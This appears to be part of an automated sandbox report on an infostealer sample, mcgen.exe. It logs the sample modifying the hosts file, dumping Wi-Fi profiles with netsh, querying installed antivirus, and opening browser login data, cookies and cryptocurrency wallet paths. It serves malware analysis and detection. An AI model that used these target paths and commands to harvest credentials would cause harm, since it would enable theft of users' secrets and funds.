              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6B9F1D080
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F35C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6B9F35C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D148CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,103_2_00007FF695D148CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\mcgen.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 3212, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.defaultJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfbaJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
